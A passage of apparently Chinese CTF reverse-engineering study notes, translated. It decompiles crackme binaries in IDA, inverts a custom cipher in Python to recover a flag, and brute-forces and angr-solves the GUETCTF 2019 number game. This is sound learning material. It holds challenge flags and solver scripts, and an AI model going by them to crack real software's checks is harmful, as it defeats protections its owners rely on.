class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># 
flag{re_is_great!}</span></span><br></pre></td></tr></table></figure><h2 id="一些奇奇怪怪的地方"><a href="#一些奇奇怪怪的地方" class="headerlink" title="Some odd spots"></a>Some odd spots</h2><p>The <code>main</code> function:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231155258537.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231155258537.png" srcset="" alt="image-20201231155258537"></p><p>Let me look at the input part more carefully. The <code>%d</code> format specifier corresponds to an <code>int</code>, i.e. 4 bytes; a <code>char</code> is one byte, which matches the <code>4*i</code> in the computation of <code>a2</code>. So <code>v6</code> and <code>v7</code> here should both be arrays of 32-bit integers, but <code>IDA</code> identified them as 64-bit. Let's fix that by hand:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span 
class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line"> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line"> __int32 v6[<span class="number">12</span>]; <span class="comment">// [rsp+10h] [rbp-60h] BYREF</span></span><br><span class="line"> __int32 v7[<span class="number">12</span>]; <span class="comment">// [rsp+40h] [rbp-30h] BYREF</span></span><br><span class="line"></span><br><span class="line"> *(_QWORD *)&v7[<span class="number">10</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line"> *(_QWORD *)v6 = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span 
class="number">6</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v6[<span class="number">8</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>);</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&v6[i];</span><br><span class="line"> __isoc99_scanf(<span class="string">"%d"</span>, a2);</span><br><span class="line"> }</span><br><span class="line"> *(_QWORD *)v7 = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">6</span>] = <span class="number">0LL</span>;</span><br><span class="line"> *(_QWORD *)&v7[<span class="number">8</span>] = <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">4</span>; j += <span class="number">2</span> )</span><br><span class="line"> {</span><br><span class="line"> dword_601078 = v6[j];</span><br><span class="line"> dword_60107C = v6[j + <span class="number">1</span>];</span><br><span class="line"> a2 = (<span class="keyword">char</span> **)&unk_601060;</span><br><span class="line"> change(&dword_601078, &unk_601060);</span><br><span class="line"> v7[j] = dword_601078;</span><br><span class="line"> v7[j + <span class="number">1</span>] = dword_60107C;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span 
class="keyword">int</span>)check(v7, a2) != <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line"> <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>With that, the somewhat confusing <code>LODWORD</code> and <code>HIDWORD</code> macros are dealt with nicely as well.</p><p>There is one more problem here:<img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160034433.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160034433.png" srcset="" alt="image-20201231160034433"></p><p>When analyzing the <code>change</code> function, its second argument is <code>unk_601060</code>; if you simply copy <code>unk_601060</code> as displayed you get: <code>2,0,0,2,0,0,0,3,0,0,0,4,0,0,0</code></p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160436992.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231160436992.png" srcset="" alt="image-20201231160436992"></p><p>But clearly it should be <code>2,2,3,4</code>. Here we need to step into the <code>change</code> function:</p><p><img 
src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161751413.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161751413.png" srcset="" alt="image-20201231161751413"></p><p>The second parameter of <code>change</code> is declared as <code>_DWORD</code>, i.e. units of 4 bytes, whereas <code>unk_601060</code> is displayed in units of one <code>byte</code>, so we press <code>D</code> on <code>unk_601060</code>:</p><p><img src="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161951206.png" class="lazyload" data-srcset="/images/%E5%85%B3%E4%BA%8ERX%E4%B8%80%E4%B8%AA%E9%A2%98%E7%9A%84%E6%80%9D%E8%80%83/image-20201231161951206.png" srcset="" alt="image-20201231161951206"></p><p>Now it looks much better~</p>]]></content>
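Added example, not code from the original writeup: a Python model of the binary's change() routine and of its inverse, used to confirm the "turn + into -" argument above and to check that decrypting the six words z3 produced passes check() and yields the flag. The function names (change, unchange, satisfies_check, recover_flag), the "% MOD" reduction standing in for unsigned int wrap-around, and the big-endian unpacking of three ASCII bytes per word are this example's own conventions; every constant is one the writeup read out of the binary.

```python
# Added example (not from the original writeup): a Python model of the binary's
# change() routine and its inverse. Each round first updates var from var_1 plus
# constants, then var_1 from var plus constants, so the inverse applies the same
# two terms with "-" instead of "+", in reverse order, with tmp counting down.
# Constants are the ones the writeup read out of the binary; "% MOD" keeps every
# value to 32 bits, the same wrap-around an unsigned int has in the C++ exploit.
from typing import List, Sequence, Tuple

MOD = 2 ** 32
DELTA = 0x458BCD42
ROUNDS = 64
TABLES = (2, 2, 3, 4)  # unk_601060 viewed as four DWORDs, not as fifteen bytes

# Ciphertext words recovered from check() with z3 in the writeup.
FLAG_ENC = [3746099070, 550153460, 3774025685, 1548802262, 2652626477, 2230518816]


def term_for_var(var_1: int, tmp: int, t: Sequence[int]) -> int:
    """Value added to var in one round; depends only on var_1 and constants.
    var_1 * 64 is the decompiled shift-left by 6 before the 32-bit reduction."""
    return ((var_1 + tmp + 11) ^ (var_1 * 64 + t[0]) ^ ((var_1 >> 9) + t[1]) ^ 0x20) % MOD


def term_for_var_1(var: int, tmp: int, t: Sequence[int]) -> int:
    """Value added to var_1 in one round; depends only on var and constants."""
    return ((var + tmp + 20) ^ (var * 64 + t[2]) ^ ((var >> 9) + t[3]) ^ 0x10) % MOD


def change(v0: int, v1: int, t: Sequence[int] = TABLES) -> Tuple[int, int]:
    """Forward routine as decompiled: 64 rounds, tmp grows by DELTA each round."""
    var, var_1, tmp = v0 % MOD, v1 % MOD, 0
    for _ in range(ROUNDS):
        tmp = (tmp + DELTA) % MOD
        var = (var + term_for_var(var_1, tmp, t)) % MOD
        var_1 = (var_1 + term_for_var_1(var, tmp, t)) % MOD
    return var, var_1


def unchange(c0: int, c1: int, t: Sequence[int] = TABLES) -> Tuple[int, int]:
    """Inverse: the same terms subtracted in reverse order, tmp counting down."""
    var, var_1 = c0 % MOD, c1 % MOD
    tmp = (DELTA * ROUNDS) % MOD  # the value tmp has after the last forward round
    for _ in range(ROUNDS):
        var_1 = (var_1 - term_for_var_1(var, tmp, t)) % MOD
        var = (var - term_for_var(var_1, tmp, t)) % MOD
        tmp = (tmp - DELTA) % MOD
    return var, var_1


def encrypt_words(words: Sequence[int], t: Sequence[int] = TABLES) -> List[int]:
    """What main() does with the six scanf("%d") values: change() on each pair."""
    out: List[int] = []
    for i in range(0, len(words), 2):
        out.extend(change(words[i], words[i + 1], t))
    return out


def decrypt_words(enc: Sequence[int], t: Sequence[int] = TABLES) -> List[int]:
    """The exploit's loop: unchange() on each pair of ciphertext words."""
    out: List[int] = []
    for i in range(0, len(enc), 2):
        out.extend(unchange(enc[i], enc[i + 1], t))
    return out


def satisfies_check(words: Sequence[int]) -> bool:
    """The six conditions of check(), in unsigned 32-bit arithmetic."""
    a = [w % MOD for w in words]
    return (
        (a[2] - a[3]) % MOD == 0x84A236FF
        and (a[3] + a[4]) % MOD == 0xFA6CB703
        and (a[2] - a[4]) % MOD == 0x42D731A8
        and a[0] == 0xDF48EF7E
        and a[5] == 0x84F30420
        and a[1] == 0x20CAACF4
    )


def words_to_flag(words: Sequence[int]) -> str:
    """Each plaintext int carries three ASCII bytes in its low 24 bits, most
    significant byte first: "change input to hex and combine"."""
    return b"".join(w.to_bytes(4, "big")[1:] for w in words).decode("ascii")


def recover_flag(enc: Sequence[int] = FLAG_ENC) -> str:
    return words_to_flag(decrypt_words(enc))


if __name__ == "__main__":
    plain = decrypt_words(FLAG_ENC)
    print([hex(w) for w in plain], satisfies_check(encrypt_words(plain)))
    print(recover_flag())
```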
<categories>
<category> CTF study notes </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>RE study with RX leading the way, week 7</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/</url>
<content type="html"><![CDATA[<h3 id="GUETCTF-2019-number-game"><a href="#GUETCTF-2019-number-game" class="headerlink" title="GUETCTF 2019 number game"></a><code>GUETCTF 2019 number game</code></h3><h4 id="爆破"><a href="#爆破" class="headerlink" title="Brute force"></a>Brute force</h4><p>I read through the code; there isn't much of it, but the logic feels pretty nasty, so let's learn from the great <code>RX</code> and brute-force it!!!</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">vio</span>(<span class="params">tmp</span>):</span></span><br><span class="line">    print(<span class="string">"test_"</span>,<span class="string">": try_"</span>,tmp)</span><br><span class="line"></span><br><span class="line">    p = process(<span class="string">"./number_game"</span>)</span><br><span class="line">    p.sendline(tmp)</span><br><span class="line">    re = p.recv()</span><br><span class="line">    <span class="keyword">if</span> <span class="string">b'T'</span> <span class="keyword">in</span> re:</span><br><span class="line">        print(<span class="string">"ans: "</span>,tmp)</span><br><span 
class="line">        os.system(<span class="string">'spd-say "Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh Ahh your program has finished"'</span>)</span><br><span class="line">        a=<span class="built_in">input</span>()</span><br><span class="line">    p.close()</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fuck</span>(<span class="params">cnt,tmp</span>):</span></span><br><span class="line">    <span class="keyword">if</span> cnt==<span class="number">10</span>:</span><br><span class="line">        vio(tmp)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>,<span class="number">53</span>):</span><br><span class="line">        fuck(cnt+<span class="number">1</span>,tmp+<span class="built_in">chr</span>(i))</span><br><span class="line"></span><br><span class="line">fuck(<span class="number">0</span>,<span class="string">""</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Here <code>pwntools</code> is used to interact with the program. This brute-force script could be optimized in many places, for example with multithreading, but I don't really know multithreading yet... so I could only edit the code by hand and run several copies at the same time, which counts as multithreading too... (runs away)</p><p>Leaving that as a to-do; I'll learn multithreading when I find the time...</p><p>But <code>pwntools</code> seems to be rather slow...</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> *</span><br><span class="line"> </span><br><span class="line"><span class="built_in">list</span> = <span class="string">'01234'</span></span><br><span class="line">j = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> product(<span class="built_in">list</span>, repeat=<span class="number">10</span>):</span><br><span class="line">    <span class="built_in">input</span> = <span class="string">""</span>.join(i)</span><br><span class="line"></span><br><span class="line">    obj = subprocess.Popen([<span class="string">"./number_game"</span>], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)</span><br><span class="line">    obj.stdin.write(<span class="built_in">input</span>.encode())</span><br><span class="line">    obj.stdin.close()</span><br><span class="line">    cmd_out = obj.stdout.read()</span><br><span class="line">    obj.stdout.close()</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">input</span>)</span><br><span class="line">    <span class="built_in">print</span>(cmd_out)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">b'cxk'</span> <span class="keyword">not</span> <span class="keyword">in</span> cmd_out:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">"bingo!!!!!! : "</span>, <span class="built_in">input</span>)</span><br><span class="line">        exit()</span><br></pre></td></tr></table></figure><p>This is a <code>wp</code> borrowed from the internet; it seems to be far more efficient... I'll study it properly later. Another to-do for the pile...</p><h4 id="angr"><a href="#angr" class="headerlink" title="angr"></a>angr</h4><p><code>md</code>, my first <code>angr</code> script was missing one <code>avoid</code> address, so it never produced a result; I only noticed after peeking at Shushu's script...</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./number_game"</span>,load_options={<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>})</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find=<span class="number">0x400AC1</span>,avoid=[<span class="number">0x400AFC</span>,<span class="number">0x4006F4</span>,<span class="number">0x400736</span>,<span class="number">0x4009DF</span>])</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="comment">#b'1134240024\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'</span></span><br></pre></td></tr></table></figure><h4 id="硬刚"><a href="#硬刚" class="headerlink" title="Head-on"></a>Head-on</h4><p>Anyway, leave the brute force running in the VM; meanwhile let's keep analyzing the program:</p><p>We'll go through the functions bit by bit (Shushu's included...),</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> *v4; <span class="comment">// [rsp+8h] [rbp-38h]</span></span><br><span class="line"> __int64 input; <span class="comment">// [rsp+10h] [rbp-30h] BYREF</span></span><br><span class="line"> __int16 v6; <span class="comment">// [rsp+18h] [rbp-28h]</span></span><br><span class="line"> __int64 v7; <span class="comment">// [rsp+20h] [rbp-20h] BYREF</span></span><br><span class="line"> __int16 v8; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"> <span 
class="keyword">char</span> v9; <span class="comment">// [rsp+2Ah] [rbp-16h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> __int64 v10; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line"> v10 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line"> input = <span class="number">0LL</span>;</span><br><span class="line"> v6 = <span class="number">0</span>;</span><br><span class="line"> v7 = <span class="number">0LL</span>;</span><br><span class="line"> v8 = <span class="number">0</span>;</span><br><span class="line"> v9 = <span class="number">0</span>;</span><br><span class="line"> __isoc99_scanf(<span class="string">"%s"</span>, &input);</span><br><span class="line"> <span class="keyword">if</span> ( !(<span class="keyword">unsigned</span> <span class="keyword">int</span>)sub_4006D6((<span class="keyword">const</span> <span class="keyword">char</span> *)&input) )<span class="comment">// 48<= input <=52</span></span><br><span class="line"> {</span><br><span class="line"> v4 = (<span class="keyword">char</span> *)sub_400758((<span class="keyword">char</span> *)&input, <span class="number">0</span>, <span class="number">0xA</span>u);<span class="comment">// builds something like a linked list or a tree from the input...</span></span><br><span class="line"> sub_400807(v4, (<span class="keyword">int</span> *)&v7); <span class="comment">// reorders the input and stores it in dword_601080; it also changes v7, but I could not see where...</span></span><br><span class="line"> v9 = <span class="number">0</span>;</span><br><span class="line"> sub_400881((<span class="keyword">char</span> *)&v7);</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)sub_400917() )</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"TQL!"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span 
class="string">"flag{"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s"</span>, (<span class="keyword">const</span> <span class="keyword">char</span> *)&input);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"}"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"your are cxk!!"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v10;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>So could we do this: patch out the input check <code>sub_4006D6</code> and feed <code>0123456789</code> as input? The program never modifies the input anyway, it only reorders it:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week7/image-20210218114711072.png" srcset="" alt="image-20210218114711072"></p><p>Then <code>sub_400881</code> changes the values of <code>byte_601062~byte_601077</code>; next we look inside <code>sub_400917</code> at its checks:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0X601060</span> != <span class="number">0X601061</span> <span class="number">0X601065</span> != <span class="number">0X601066</span> <span class="number">0X60106A</span> != <span class="number">0X60106B</span></span><br><span class="line"><span class="number">0X601060</span> != <span class="number">0X601062</span> <span class="number">0X601065</span> != <span class="number">0X601067</span> <span class="number">0X60106A</span> != <span class="number">0X60106C</span></span><br><span class="line"><span class="number">0X601060</span> != <span class="number">0X601063</span> <span class="number">0X601065</span> != <span class="number">0X601068</span> <span class="number">0X60106A</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601060</span> != <span class="number">0X601064</span> <span class="number">0X601065</span> != <span class="number">0X601069</span> <span class="number">0X60106A</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601062</span> <span class="number">0X601066</span> != <span 
class="number">0X601067</span> <span class="number">0X60106B</span> != <span class="number">0X60106C</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601063</span> <span class="number">0X601066</span> != <span class="number">0X601068</span> <span class="number">0X60106B</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601064</span> <span class="number">0X601066</span> != <span class="number">0X601069</span> <span class="number">0X60106B</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601062</span> != <span class="number">0X601063</span> <span class="number">0X601067</span> != <span class="number">0X601068</span> <span class="number">0X60106C</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601062</span> != <span class="number">0X601064</span> <span class="number">0X601067</span> != <span class="number">0X601069</span> <span class="number">0X60106C</span> != <span class="number">0X60106E</span></span><br><span class="line"><span class="number">0X601063</span> != <span class="number">0X601064</span> <span class="number">0X601068</span> != <span class="number">0X601069</span> <span class="number">0X60106D</span> != <span class="number">0X60106E</span></span><br><span class="line"></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601070</span> <span class="number">0X601074</span> != <span class="number">0X601075</span> <span class="number">0X601060</span> != <span class="number">0X601065</span></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601071</span> <span class="number">0X601074</span> != <span class="number">0X601076</span> <span class="number">0X601060</span> != <span class="number">0X60106A</span></span><br><span class="line"><span 
class="number">0X60106F</span> != <span class="number">0X601072</span> <span class="number">0X601074</span> != <span class="number">0X601077</span> <span class="number">0X601060</span> != <span class="number">0X60106F</span></span><br><span class="line"><span class="number">0X60106F</span> != <span class="number">0X601073</span> <span class="number">0X601074</span> != <span class="number">0X601078</span> <span class="number">0X601060</span> != <span class="number">0X601074</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601071</span> <span class="number">0X601075</span> != <span class="number">0X601076</span> <span class="number">0X601065</span> != <span class="number">0X60106A</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601072</span> <span class="number">0X601075</span> != <span class="number">0X601077</span> <span class="number">0X601065</span> != <span class="number">0X60106F</span></span><br><span class="line"><span class="number">0X601070</span> != <span class="number">0X601073</span> <span class="number">0X601075</span> != <span class="number">0X601078</span> <span class="number">0X601065</span> != <span class="number">0X601074</span></span><br><span class="line"><span class="number">0X601071</span> != <span class="number">0X601072</span> <span class="number">0X601076</span> != <span class="number">0X601077</span> <span class="number">0X60106A</span> != <span class="number">0X60106F</span></span><br><span class="line"><span class="number">0X601071</span> != <span class="number">0X601073</span> <span class="number">0X601076</span> != <span class="number">0X601078</span> <span class="number">0X60106A</span> != <span class="number">0X601074</span></span><br><span class="line"><span class="number">0X601072</span> != <span class="number">0X601073</span> <span class="number">0X601077</span> != <span class="number">0X601078</span> <span 
class="number">0X60106F</span> != <span class="number">0X601074</span></span><br><span class="line"></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601066</span> <span class="number">0X601062</span> != <span class="number">0X601067</span> <span class="number">0X601063</span> != <span class="number">0X601068</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X60106B</span> <span class="number">0X601062</span> != <span class="number">0X60106C</span> <span class="number">0X601063</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601070</span> <span class="number">0X601062</span> != <span class="number">0X601071</span> <span class="number">0X601063</span> != <span class="number">0X601072</span></span><br><span class="line"><span class="number">0X601061</span> != <span class="number">0X601075</span> <span class="number">0X601062</span> != <span class="number">0X601076</span> <span class="number">0X601063</span> != <span class="number">0X601077</span></span><br><span class="line"><span class="number">0X601066</span> != <span class="number">0X60106B</span> <span class="number">0X601067</span> != <span class="number">0X60106C</span> <span class="number">0X601068</span> != <span class="number">0X60106D</span></span><br><span class="line"><span class="number">0X601066</span> != <span class="number">0X601070</span> <span class="number">0X601067</span> != <span class="number">0X601071</span> <span class="number">0X601068</span> != <span class="number">0X601072</span></span><br><span class="line"><span class="number">0X601066</span> != <span class="number">0X601075</span> <span class="number">0X601067</span> != <span class="number">0X601076</span> <span class="number">0X601068</span> != <span class="number">0X601077</span></span><br><span class="line"><span class="number">0X60106B</span> != <span 
